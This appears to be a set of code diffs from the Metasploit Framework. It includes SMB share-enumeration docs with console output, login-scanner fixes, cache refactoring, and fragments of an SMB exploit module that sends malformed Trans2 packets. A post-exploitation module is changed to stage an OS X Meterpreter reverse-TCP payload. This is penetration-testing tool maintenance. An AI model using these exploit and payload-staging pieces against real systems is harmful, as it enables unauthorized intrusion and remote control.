msf auxiliary(smb2) > run
[*] 192.168.1.162 supports SMB 2 [dialect 255.2] and has been online for 618 hours
[*] Scanned 06 of 16 hosts (037% complete)
[*] Scanned 13 of 16 hosts (081% complete)
[*] Scanned 14 of 16 hosts (087% complete)
[*] Scanned 16 of 16 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb2) >
```

View File

@ -0,0 +1,63 @@
## Description
The `smb_enumshares` module, as would be expected, enumerates any SMB shares that are available on a remote system.
## Verification Steps
1. Do: ```use auxiliary/scanner/smb/smb_enumshares```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set THREADS [number of threads]```
4. Do: ```run```
## Scenarios
### Uncredentialed
```
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.1.150-165
RHOSTS => 192.168.1.150-165
msf auxiliary(smb_enumshares) > set THREADS 16
THREADS => 16
msf auxiliary(smb_enumshares) > run
[*] 192.168.1.154:139 print$ - Printer Drivers (DISK), tmp - oh noes! (DISK), opt - (DISK), IPC$ - IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC), ADMIN$ - IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC)
Error: 192.168.1.160 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
Error: 192.168.1.160 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
[*] 192.168.1.161:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
Error: 192.168.1.162 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
Error: 192.168.1.150 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
Error: 192.168.1.150 Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=37 WordCount=0)
[*] Scanned 06 of 16 hosts (037% complete)
[*] Scanned 09 of 16 hosts (056% complete)
[*] Scanned 10 of 16 hosts (062% complete)
[*] Scanned 14 of 16 hosts (087% complete)
[*] Scanned 15 of 16 hosts (093% complete)
[*] Scanned 16 of 16 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) >
```
### Credentialed
As you can see in the previous scan, access is denied to most of the systems that are probed.
Doing a Credentialed scan produces much different results.
```
msf auxiliary(smb_enumshares) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_enumshares) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(smb_enumshares) > run
[*] 192.168.1.161:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
[*] 192.168.1.160:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
[*] 192.168.1.150:139 IPC$ - Remote IPC (IPC), ADMIN$ - Remote Admin (DISK), C$ - Default share (DISK)
[*] Scanned 06 of 16 hosts (037% complete)
[*] Scanned 07 of 16 hosts (043% complete)
[*] Scanned 12 of 16 hosts (075% complete)
[*] Scanned 15 of 16 hosts (093% complete)
[*] Scanned 16 of 16 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) >
```

View File

@ -118,14 +118,14 @@ module Metasploit
end end
case status_code.name case status_code.name
when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES when 'STATUS_SUCCESS', 'STATUS_PASSWORD_MUST_CHANGE', 'STATUS_PASSWORD_EXPIRED'
status = Metasploit::Model::Login::Status::DENIED_ACCESS
when 'STATUS_SUCCESS'
status = Metasploit::Model::Login::Status::SUCCESSFUL status = Metasploit::Model::Login::Status::SUCCESSFUL
when 'STATUS_ACCOUNT_LOCKED_OUT' when 'STATUS_ACCOUNT_LOCKED_OUT'
status = Metasploit::Model::Login::Status::LOCKED_OUT status = Metasploit::Model::Login::Status::LOCKED_OUT
when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED' when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
status = Metasploit::Model::Login::Status::INCORRECT status = Metasploit::Model::Login::Status::INCORRECT
when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES
status = Metasploit::Model::Login::Status::DENIED_ACCESS
else else
status = Metasploit::Model::Login::Status::INCORRECT status = Metasploit::Model::Login::Status::INCORRECT
end end

View File

@ -29,15 +29,22 @@ module Msf::Exploit::Remote::Fortinet
password || '' password || ''
)) ))
tried = false
loop do loop do
message = session.next_message message = session.next_message
return false unless message
case message.type case message.type
when USERAUTH_SUCCESS when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true return true
when USERAUTH_FAILURE when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' } debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
break if tried
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' } debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
send_message(userauth_request( send_message(userauth_request(
@ -54,6 +61,8 @@ module Msf::Exploit::Remote::Fortinet
'', '',
'' ''
)) ))
tried = true
when USERAUTH_INFO_REQUEST when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }

View File

@ -24,6 +24,7 @@ class Cache
# Refreshes cached module metadata as well as updating the store # Refreshes cached module metadata as well as updating the store
# #
def refresh_metadata_instance(module_instance) def refresh_metadata_instance(module_instance)
dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
refresh_metadata_instance_internal(module_instance) refresh_metadata_instance_internal(module_instance)
update_store update_store
end end
@ -48,8 +49,22 @@ class Cache
mt[1].keys.sort.each do |mn| mt[1].keys.sort.each do |mn|
next if unchanged_reference_name_set.include? mn next if unchanged_reference_name_set.include? mn
module_instance = mt[1].create(mn)
next if not module_instance begin
module_instance = mt[1].create(mn)
rescue Exception => e
elog "Unable to create module: #{mn}. #{e.message}"
end
unless module_instance
wlog "Removing invalid module reference from cache: #{mn}"
existed = remove_from_cache(mn)
if existed
has_changes = true
end
next
end
begin begin
refresh_metadata_instance_internal(module_instance) refresh_metadata_instance_internal(module_instance)
has_changes = true has_changes = true
@ -72,7 +87,7 @@ class Cache
@module_metadata_cache.each_value do |module_metadata| @module_metadata_cache.each_value do |module_metadata|
unless module_metadata.path and ::File.exist?(module_metadata.path) unless module_metadata.path && ::File.exist?(module_metadata.path)
next next
end end
@ -91,12 +106,28 @@ class Cache
private private
####### #######
def remove_from_cache(module_name)
old_cache_size = @module_metadata_cache.size
@module_metadata_cache.delete_if {|_, module_metadata|
module_metadata.ref_name.eql? module_name
}
return old_cache_size != @module_metadata_cache.size
end
def wait_for_load def wait_for_load
@load_thread.join unless @store_loaded @load_thread.join unless @store_loaded
end end
def refresh_metadata_instance_internal(module_instance) def refresh_metadata_instance_internal(module_instance)
metadata_obj = Obj.new(module_instance) metadata_obj = Obj.new(module_instance)
# Remove all instances of modules pointing to the same path. This prevents stale data hanging
# around when modules are incorrectly typed (eg: Auxilary that should be Exploit)
@module_metadata_cache.delete_if {|_, module_metadata|
module_metadata.path.eql? metadata_obj.path
}
@module_metadata_cache[get_cache_key(module_instance)] = metadata_obj @module_metadata_cache[get_cache_key(module_instance)] = metadata_obj
end end

View File

@ -78,7 +78,7 @@ module Msf::Payload::Android
cert.public_key = key.public_key cert.public_key = key.public_key
# Some time within the last 3 years # Some time within the last 3 years
cert.not_before = Time.now - rand(3600*24*365*3) cert.not_before = Time.now - rand(3600 * 24 * 365 * 3)
# From http://developer.android.com/tools/publishing/app-signing.html # From http://developer.android.com/tools/publishing/app-signing.html
# """ # """
@ -89,7 +89,16 @@ module Msf::Payload::Android
# requirement. You cannot upload an application if it is signed # requirement. You cannot upload an application if it is signed
# with a key whose validity expires before that date. # with a key whose validity expires before that date.
# """ # """
cert.not_after = cert.not_before + 3600*24*365*20 # 20 years #
# 32-bit Ruby (and 64-bit Ruby on Windows) cannot deal with
# certificate not_after times later than Jan 1st 2038, since long is 32-bit.
# Set not_after to a random time 2~ years before the first bad date.
#
# FIXME: this will break again randomly starting in late 2033, hopefully
# all 32-bit systems will be dead by then...
#
# The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
cert.not_after = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))
# If this line is left out, signature verification fails on OSX. # If this line is left out, signature verification fails on OSX.
cert.sign(key, OpenSSL::Digest::SHA1.new) cert.sign(key, OpenSSL::Digest::SHA1.new)

View File

@ -216,7 +216,8 @@ class MetasploitModule < Msf::Exploit::Remote
@cert.issuer = x509_name @cert.issuer = x509_name
@cert.public_key = @key.public_key @cert.public_key = @key.public_key
@cert.not_before = Time.now @cert.not_before = Time.now
@cert.not_after = @cert.not_before + 3600*24*365*3 # 3 years # FIXME: this will break in the year 2037 on 32-bit systems
@cert.not_after = @cert.not_before + 3600 * 24 * 365 # 1 year
end end
end end

View File

@ -52,6 +52,11 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
if datastore['DisablePayloadHandler']
print_error "DisablePayloadHandler is enabled, so there is nothing to do. Exiting!"
return
end
stime = Time.now.to_f stime = Time.now.to_f
timeout = datastore['ListenerTimeout'].to_i timeout = datastore['ListenerTimeout'].to_i
loop do loop do

View File

@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
'WfsDelay' => 5,
}, },
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
# we don't need this sleep, and need to find a way to remove it # we don't need this sleep, and need to find a way to remove it
# problem is session_count won't increment until stage is complete :\ # problem is session_count won't increment until stage is complete :\
secs = 0 secs = 0
while !session_created? and secs < 5 while !session_created? and secs < 30
secs += 1 secs += 1
sleep 1 sleep 1
end end
@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote
rescue EternalBlueError => e rescue EternalBlueError => e
print_error("#{e.message}") print_error("#{e.message}")
return false
rescue ::RubySMB::Error::NegotiationFailure
print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.")
return false
rescue ::RubySMB::Error::UnexpectedStatusCode, rescue ::RubySMB::Error::UnexpectedStatusCode,
::Errno::ECONNRESET, ::Errno::ECONNRESET,
::Rex::HostUnreachable, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout, ::Rex::ConnectionTimeout,
::Rex::ConnectionRefused => e ::Rex::ConnectionRefused,
::RubySMB::Error::CommunicationError => e
print_error("#{e.class}: #{e.message}") print_error("#{e.class}: #{e.message}")
report_failure
return false
rescue => error rescue => error
print_error(error.class.to_s) print_error(error.class.to_s)
print_error(error.message) print_error(error.message)
print_error(error.backtrace.join("\n")) print_error(error.backtrace.join("\n"))
return false
ensure ensure
# pass # pass
end end
@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
'''
# #
# Increase the default delay by five seconds since some kernel-mode # Increase the default delay by five seconds since some kernel-mode
# payloads may not run immediately. # payloads may not run immediately.
@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
def wfs_delay def wfs_delay
super + 5 super + 5
end end
'''
def smb2_grooms(grooms, payload_hdr_pkt) def smb2_grooms(grooms, payload_hdr_pkt)
grooms.times do |groom_id| grooms.times do |groom_id|
@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Sending malformed Trans2 packets") vprint_status("Sending malformed Trans2 packets")
sock.put(trans2_pkt_nulled) sock.put(trans2_pkt_nulled)
sock.get_once begin
sock.get_once
rescue EOFError
vprint_error("No response back from SMB echo request. Continuing anyway...")
end
client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00") client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
end end

View File

@ -81,8 +81,10 @@ class MetasploitModule < Msf::Post
psh_arch = 'x86' psh_arch = 'x86'
vprint_status("Platform: Windows") vprint_status("Platform: Windows")
when 'osx' when 'osx'
platform = 'python' platform = 'osx'
payload_name = 'python/meterpreter/reverse_tcp' payload_name = 'osx/x64/meterpreter/reverse_tcp'
lplat = [Msf::Platform::OSX]
larch = [ARCH_X64]
vprint_status("Platform: OS X") vprint_status("Platform: OS X")
when 'solaris' when 'solaris'
platform = 'python' platform = 'python'
@ -99,8 +101,10 @@ class MetasploitModule < Msf::Post
larch = [ARCH_X86] larch = [ARCH_X86]
vprint_status("Platform: Linux") vprint_status("Platform: Linux")
elsif target_info =~ /darwin/i elsif target_info =~ /darwin/i
platform = 'python' platform = 'osx'
payload_name = 'python/meterpreter/reverse_tcp' payload_name = 'osx/x64/meterpreter/reverse_tcp'
lplat = [Msf::Platform::OSX]
larch = [ARCH_X64]
vprint_status("Platform: OS X") vprint_status("Platform: OS X")
elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/ elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
# Generic fallback for OSX, Solaris, Linux/ARM # Generic fallback for OSX, Solaris, Linux/ARM
@ -162,7 +166,7 @@ class MetasploitModule < Msf::Post
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
vprint_status("Transfer method: VBS [fallback]") vprint_status("Transfer method: VBS [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe) aborted = transmit_payload(exe, platform)
end end
end end
when 'python' when 'python'
@ -171,7 +175,7 @@ class MetasploitModule < Msf::Post
else else
vprint_status("Transfer method: Bourne shell [fallback]") vprint_status("Transfer method: Bourne shell [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe) aborted = transmit_payload(exe, platform)
end end
if datastore['HANDLER'] if datastore['HANDLER']
@ -181,7 +185,7 @@ class MetasploitModule < Msf::Post
return nil return nil
end end
def transmit_payload(exe) def transmit_payload(exe, platform)
# #
# Generate the stager command array # Generate the stager command array
# #
@ -193,16 +197,18 @@ class MetasploitModule < Msf::Post
:linemax => linemax, :linemax => linemax,
#:nodelete => true # keep temp files (for debugging) #:nodelete => true # keep temp files (for debugging)
} }
if session.platform == 'windows' case platform
when 'windows'
opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64') opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe) cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
when 'osx'
opts[:background] = true
cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe)
else else
opts[:background] = true opts[:background] = true
opts[:temp] = datastore['BOURNE_PATH'] opts[:temp] = datastore['BOURNE_PATH']
opts[:file] = datastore['BOURNE_FILE'] opts[:file] = datastore['BOURNE_FILE']
cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe) cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
# Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
# as /bin/sh on OS X doesn't support the -n option on echo
end end
cmds = cmdstager.generate(opts) cmds = cmdstager.generate(opts)

View File

@ -31,6 +31,7 @@ class MetasploitModule < Msf::Post
keys = [ keys = [
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ], [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId4" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ], [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ], [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ], [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],

View File

@ -32,7 +32,7 @@ end
if (framework.plugins.to_s =~ /[Ww]map/) if (framework.plugins.to_s =~ /[Ww]map/)
print_line("Wmap plugin already loaded ...") print_line("Wmap plugin already loaded ...")
else else
print_line("loading the wmap plugin ...") print_line("Loading the wmap plugin ...")
run_single("load wmap") run_single("load wmap")
end end
@ -78,7 +78,7 @@ framework.db.hosts.each do |host|
end end
run_single("wmap_targets -c") run_single("wmap_targets -c")
print_line("") print_line("")
print_line("finished analysing the webservern on IP #{host.address.to_s}, Port: #{serv.port.to_s}") print_line("Finished analysing the webserver on IP #{host.address.to_s}, Port: #{serv.port.to_s}")
print_line("") print_line("")
end end
end end

View File

@ -11,7 +11,7 @@
"TYPE": "VIRTUAL", "TYPE": "VIRTUAL",
"METHOD": "VM_TOOLS_UPLOAD", "METHOD": "VM_TOOLS_UPLOAD",
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json", "HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
"NAME": "APT_MSF_HOST", "CPE": "cpe:/a:rapid7:metasploit:::",
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts", "MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts",
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework" "MSF_PATH": "/home/msfuser/rapid7/metasploit-framework"
} }
@ -22,7 +22,7 @@
{ {
"TYPE": "VIRTUAL", "TYPE": "VIRTUAL",
"METHOD": "EXPLOIT", "METHOD": "EXPLOIT",
"NAME": "Win2008r2x64sp1", "CPE": "cpe:/o:microsoft:windows_server_2008:r2:sp1:x64",
"MODULES": "MODULES":
[ [
{ {
@ -37,7 +37,7 @@
{ {
"TYPE": "VIRTUAL", "TYPE": "VIRTUAL",
"METHOD": "EXPLOIT", "METHOD": "EXPLOIT",
"NAME": "Win2012x64", "CPE": "cpe:/o:microsoft:windows_server_2016:::x64",
"MODULES": "MODULES":
[ [
{ {

View File

@ -9,7 +9,7 @@
"TYPE": "VIRTUAL", "TYPE": "VIRTUAL",
"METHOD": "VM_TOOLS_UPLOAD", "METHOD": "VM_TOOLS_UPLOAD",
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json", "HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
"NAME": "APT_MSF_HOST", "CPE": "cpe:/a:rapid7:metasploit:::",
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework", "MSF_PATH": "/home/msfuser/rapid7/metasploit-framework",
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts" "MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts"
} }
@ -30,7 +30,7 @@
{ {
"TYPE": "VIRTUAL", "TYPE": "VIRTUAL",
"METHOD": "EXPLOIT", "METHOD": "EXPLOIT",
"NAME": "Win7x64" "NAME": "SATA_Win7x64"
} }
], ],
"MODULES": "MODULES":